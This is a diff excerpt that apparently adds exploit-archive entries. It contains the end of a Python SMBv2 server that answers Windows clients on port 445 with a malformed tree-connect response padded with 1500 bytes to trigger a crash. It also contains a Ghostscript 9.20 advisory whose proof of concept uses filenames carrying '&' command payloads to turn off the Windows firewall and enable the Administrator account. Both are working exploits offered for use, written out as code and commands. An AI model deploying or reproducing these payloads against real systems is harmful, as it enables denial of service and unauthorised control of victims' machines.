+		self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
+		self.fields["NTLMSSPNTLMChallengeAVPairsLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])))
+
+class SMB2SessionAcceptData(Packet):
+	fields = OrderedDict([
+		("Len",                       "\x09\x00"),
+		("SessionFlag",               "\x01\x00"),
+		("SecBlobOffSet",             "\x48\x00"),
+		("SecBlobLen",                "\x1d\x00"),
+		("SecBlobTag0",               "\xa1"), 
+		("SecBlobTag0Len",            "\x1b"),
+		("NegTokenResp",              "\x30"), 
+		("NegTokenRespLen",           "\x19"), 
+		("NegTokenRespTag0",          "\xa0"), 
+		("NegTokenRespTag0Len",       "\x03"), 
+		("NegStateResp",              "\x0a"), 
+		("NegTokenRespLen1",           "\x01"), 
+		("NegTokenRespStr",           "\x00"),
+		("SecBlobTag3",               "\xa3"), 
+		("SecBlobTag3Len",            "\x12"),
+		("SecBlobOctetHeader",        "\x04"), 
+		("SecBlobOctetLen",           "\x10"),
+		("MechlistMICVersion",        ""),# No verification on the client side...
+		("MechlistCheckSum",          ""),
+		("MechlistSeqNumber",         ""),
+                ("Data",                      ""),
+    ])
+	def calculate(self):
+
+		###### SecBlobLen Calc:
+		CalculateSecBlob = str(self.fields["SecBlobTag0"])+str(self.fields["SecBlobTag0Len"])+str(self.fields["NegTokenResp"])+str(self.fields["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fields["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fields["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])
+
+		CalculateASN = str(self.fields["NegTokenResp"])+str(self.fields["NegTokenRespLen"])+str(self.fields["NegTokenRespTag0"])+str(self.fields["NegTokenRespTag0Len"])+str(self.fields["NegStateResp"])+str(self.fields["NegTokenRespLen1"])+str(self.fields["NegTokenRespStr"])+str(self.fields["SecBlobTag3"])+str(self.fields["SecBlobTag3Len"])+str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])
+
+                MechLen = str(self.fields["SecBlobOctetHeader"])+str(self.fields["SecBlobOctetLen"])+str(self.fields["MechlistMICVersion"])+str(self.fields["MechlistCheckSum"])+str(self.fields["MechlistSeqNumber"])
+
+                #Packet Struct len
+		self.fields["SecBlobLen"] = struct.pack("<h",len(CalculateSecBlob))
+		self.fields["SecBlobTag0Len"] = struct.pack("<B",len(CalculateASN))
+		self.fields["NegTokenRespLen"] = struct.pack("<B", len(CalculateASN)-2)
+                self.fields["SecBlobTag3Len"] = struct.pack("<B",len(MechLen))
+                self.fields["SecBlobOctetLen"] = struct.pack("<B",len(MechLen)-2)
+
+class SMB2TreeData(Packet):
+    fields = OrderedDict([
+		("Len",                   "\x10\x00"),
+		("ShareType",             "\x02\x00"),
+		("ShareFlags",            "\x30\x00\x00\x00"),
+		("ShareCapabilities",     "\x00\x00\x00\x00"),
+		("AccessMask",            "\xff\x01\x1f\x01"),   
+		("Data",                  ""),         
+    ])
+
+##########################################################################
+class SMB2(SocketServer.BaseRequestHandler):
+     
+    def handle(self):
+        try:
+              self.request.settimeout(1)
+              print "From:", self.client_address
+              data = self.request.recv(1024)
+
+             ##Negotiate proto answer.
+              if data[8:10] == "\x72\x00" and data[4:5] == "\xff":
+                head = SMBv2Header(CreditCharge="\x00\x00",Credits="\x01\x00",PID="\x00\x00\x00\x00")
+                t = SMB2NegoAns()
+                t.calculate()
+                packet1 = str(head)+str(t)
+                buffer1 = longueur(packet1)+packet1  
+                print "[*]Negotiating SMBv2."
+                self.request.send(buffer1)
+                data = self.request.recv(1024)
+
+              if data[16:18] == "\x00\x00":
+                CreditsRequested = data[18:20]
+                if CreditsRequested == "\x00\x00":
+                   CreditsRequested =  "\x01\x00"
+                CreditCharged = data[10:12]
+                head = SMBv2Header(MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data))
+                t = SMB2NegoAns(Dialect="\x02\x02")
+                t.calculate()
+                packet1 = str(head)+str(t)
+                buffer1 = longueur(packet1)+packet1  
+                print "[*]Negotiate Protocol SMBv2 packet sent."
+                self.request.send(buffer1)
+                data = self.request.recv(1024)
+
+              #Session More Work to Do
+              if data[16:18] == "\x01\x00":
+                head = SMBv2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), SessionID="\x4d\x00\x00\x00\x00\x04\x00\x00",NTStatus="\x16\x00\x00\xc0")
+                t = SMB2Session1Data()
+                t.calculate()
+                packet1 = str(head)+str(t)
+                buffer1 = longueur(packet1)+packet1
+                print "[*]Session challenge SMBv2 packet sent."
+                self.request.send(buffer1)
+                data = self.request.recv(1024)
+
+              #Session Positive
+              if data[16:18] == "\x01\x00" and GrabMessageID(data)[0:1] == "\x02":
+                head = SMBv2Header(Cmd="\x01\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x00\x00\x00\x00", SessionID=GrabSessionID(data))
+                t = SMB2SessionAcceptData()
+                t.calculate()
+                packet1 = str(head)+str(t)
+                buffer1 = longueur(packet1)+packet1
+                self.request.send(buffer1)
+                data = self.request.recv(1024)
+
+              ## Tree Connect
+              if data[16:18] == "\x03\x00":
+                head = SMBv2Header(Cmd="\x03\x00", MessageId=GrabMessageID(data), PID="\xff\xfe\x00\x00", TID="\x01\x00\x00\x00", CreditCharge=GrabCreditCharged(data), Credits=GrabCreditRequested(data), NTStatus="\x00\x00\x00\x00", SessionID=GrabSessionID(data))
+                t = SMB2TreeData(Data="C"*1500)#//BUG
+                packet1 = str(head)+str(t)
+                buffer1 = longueur(packet1)+packet1
+                print "[*]Triggering Bug; Tree Connect SMBv2 packet sent."
+                self.request.send(buffer1)
+                data = self.request.recv(1024)
+
+        except Exception:
+           print "Disconnected from", self.client_address
+           pass
+
+SocketServer.TCPServer.allow_reuse_address = 1
+launch = SocketServer.TCPServer(('', 445),SMB2)
+launch.serve_forever()

platforms/windows/local/41221.txt

@@ -0,0 +1,123 @@
+[+]#################################################################################################
+[+] Credits: John Page AKA hyp3rlinx
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/GHOSTSCRIPT-FILENAME-COMMAND-EXECUTION.txt
+[+] ISR: ApparitionSec
+[+]################################################################################################
+
+
+
+Vendor:
+===============
+ghostscript.com
+
+
+
+Product:
+================
+Ghostscript 9.20
+gs920w32.exe
+Windows (32 bit)
+hash: fee2cc1b8b467888a4ed44dd9f4567ed
+
+
+Ghostscript is a suite of software based Postscript and PDF
+interpreter/renderers for file conversion.
+
+
+Vulnerability Type:
+==========================
+Filename Command Execution
+
+
+
+CVE Reference:
+==============
+N/A
+
+
+
+Security Issue:
+================
+The ghostscript ps2epsi translator to processes ".ps" files executes
+arbitrary commands from specially crafted filenames that contain
+OS commands as part of the processed postscript files name. This feature
+seems to work only using the ps2epsi translator.
+Other tested GS translator calls like 'ps2pdf' fail.
+
+c:\>ps2epsi
+"Usage: ps2epsi <infile.ps> <outfile.epi>"
+
+Example, take a file "POC&<SYSTEM-COMMAND>;1.ps", it will run arbitrary
+Commands contained after the ampersand character "&".
+
+If a user runs some automated script to call the ps2epsi translator to
+process ".ps" files from a remote share or directory
+where actual filename is unknown, it can potentially allow attackers to
+execute arbitrary commands on victims machine.
+
+Characters like "/", ":" are restricted in filenames, but we can abuse
+Windows netsh and wmic to bypass some of these barriers.
+
+Quick Ghostscript CL test.
+Create file called Test&calc.exe;1.ps
+
+ps2epsi "Test&calc.exe;1.ps"  outfile
+
+BOOM! calc.exe runs...
+
+
+Exploit/POC:
+=============
+Add Ghostscript lib 'c:\Program Files (x86)\gs\gs9.20\lib' to Windows
+environmental Path, so we can easily call 'ps2epsi' GS CMD.
+
+Create the following malicious ".ps" postscript files.
+
+1) Turn of Windows Firewall
+Test&netsh Advfirewall set allprofiles state off&;1.ps
+
+
+2) Enable Windows Administrator account (using WMIC).
+Test&wmic useraccount where name='administrator' set disabled='false'&;1.ps
+
+If user don't have wmic on path, fix it for POC by set environmental system
+variable.
+Add "C:\Windows\system32\wbem;" to 'Path' variable.
+
+Run below bat script to process bunch of *.ps" files.
+
+"POC.bat"
+
+@echo off
+rem ghostscript Filename Command Execution POC
+rem by hyp3rlinx
+
+for %%1 in ("*.ps") do; ps2epsi  "%%1" "evil.ps"
+
+
+Severity:
+=========
+Medium
+
+
+
+Disclosure Timeline:
+===============================
+Vendor Notification: No replies
+February 2, 2017 : Public Disclosure
+
+
+
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no
+warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory,
+provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in
+vulnerability databases and similar, provided that due credit
+is given to the author. The author is not responsible for any misuse of the
+information contained herein and accepts no responsibility
+for any damage caused by the use or misuse of this information. The author
+prohibits any malicious use of security related information
+or exploits by the author or elsewhere.